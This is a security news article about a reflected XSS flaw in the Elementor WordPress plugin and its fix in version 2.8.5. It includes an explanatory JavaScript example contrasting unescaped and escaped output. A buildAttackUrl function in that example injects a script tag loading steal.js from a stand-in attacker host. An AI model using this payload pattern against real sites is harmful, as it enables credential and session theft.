Vulnerability in Elementor page builder plugin affects more than 4 million WordPress sites

When a new security flaw is reported in a piece of software, a race starts between the developers responsible for fixing it and the cybercriminals who want to exploit it. This is especially true for the most widely used products, such as popular WordPress plugins.

Elementor, one of the world's most popular WordPress plugins, contains an authenticated reflected cross-site scripting (XSS) vulnerability. Exploiting it would let a threat actor run a script of their choosing, hosted on a site they control, in the context of a vulnerable WordPress site, in order to carry out malicious actions such as stealing login credentials. Because the flaw is an authenticated one, the victim must be logged in to the vulnerable site when the attack link is followed.

Vulnerability testing experts explain that the flaw lies in how the vulnerable site reflects user-supplied input, for example the contents of a search box, back into the page without properly escaping it, which allows an attacker to load a script into the page. A possible exploitation scenario is described below:

  • The
    threat actor crafts a specially designed URL pointing at the vulnerable
    site, with the malicious script reference embedded in it
  • The
    threat actor sends the link to target users of the attacked website,
    typically users who are logged in
  • When
    a victim follows the URL, the script, which is hosted on an external site
    controlled by the attacker, runs in the victim's browser in the context of
    the attacked website and can steal their credentials
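To make the mechanism concrete, the following added example (written for this article; it is not code from Elementor or from the original page) shows the vulnerable pattern behind a reflected XSS in a search box next to its fixed form: a template that echoes the `q` query parameter into the page unescaped, and the same template with HTML escaping on output. The parameter name `q`, the hostnames and the payload are assumptions; the WordPress equivalent of the `escapeHtml` helper is `esc_html()` (or `esc_attr()` inside attributes).

```javascript
// Added example for this article; hypothetical, not Elementor's code.
// The parameter name "q" and the hostnames are assumptions.

// Vulnerable pattern: the search term is dropped straight into the HTML,
// so markup carried in the URL is reflected into the page as live markup.
function renderSearchVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') || '';
  return `<p>Results for: ${q}</p>`;
}

// Escape the characters that can break out of HTML text or attribute
// context. WordPress code would call esc_html() here instead.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed pattern: the same template, but the term is escaped on output, so
// the browser shows the payload as text instead of executing it.
function renderSearchFixed(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') || '';
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Build the kind of link the attacker would send: a URL to the target site
// whose search parameter carries a <script> tag pointing at a script on a
// host the attacker controls (both hosts below are constructed, not real).
function buildAttackUrl(targetOrigin, scriptUrl) {
  const payload = `<script src="${scriptUrl}"></script>`;
  return `${targetOrigin}/?q=${encodeURIComponent(payload)}`;
}

// Crude stand-in for the browser's parser: does a script element survive
// into the rendered HTML?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attack link against a fictitious victim site.
const attackUrl = buildAttackUrl('https://victim.example', 'https://attacker.example/steal.js');

if (typeof require !== 'undefined' && require.main === module) {
  // The vulnerable render keeps the <script> tag; the fixed one neutralises it.
  console.log('vulnerable:', renderSearchVulnerable(attackUrl));
  console.log('fixed:     ', renderSearchFixed(attackUrl));
}
```

The script referenced from the injected tag runs with the origin of the attacked site, which is why it can read that site's cookies, tokens or form contents and why the attack only pays off when the victim is logged in. The fix is not to filter the input but to escape it at the point where it is written into HTML.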

This flaw has already been recorded in the WordPress Vulnerability Database, a platform that tracks vulnerabilities found in the content management system and its most popular plugins. Its administrators stated that, to avoid exploitation in the wild, the proof of concept will remain unpublished until at least February 12.

The vulnerability was found by a security firm, which reported it to the Elementor developers as soon as possible. The developers of the WordPress visual builder fixed the flaw promptly, and the vulnerability was publicly disclosed only once the fix was available.

Specialists in vulnerability testing from the International Institute of Cyber Security (IICS) note that the flaw affects Elementor versions 2.8.4 and earlier; the fix is in version 2.8.5. Site owners should update from the admin interface of their WordPress site: after logging in, an update notice for the plugin appears in the dashboard; otherwise, the plugin can be updated from the Plugins entry in the administrator sidebar. Given the race described above, the update should be applied before the proof of concept becomes public.
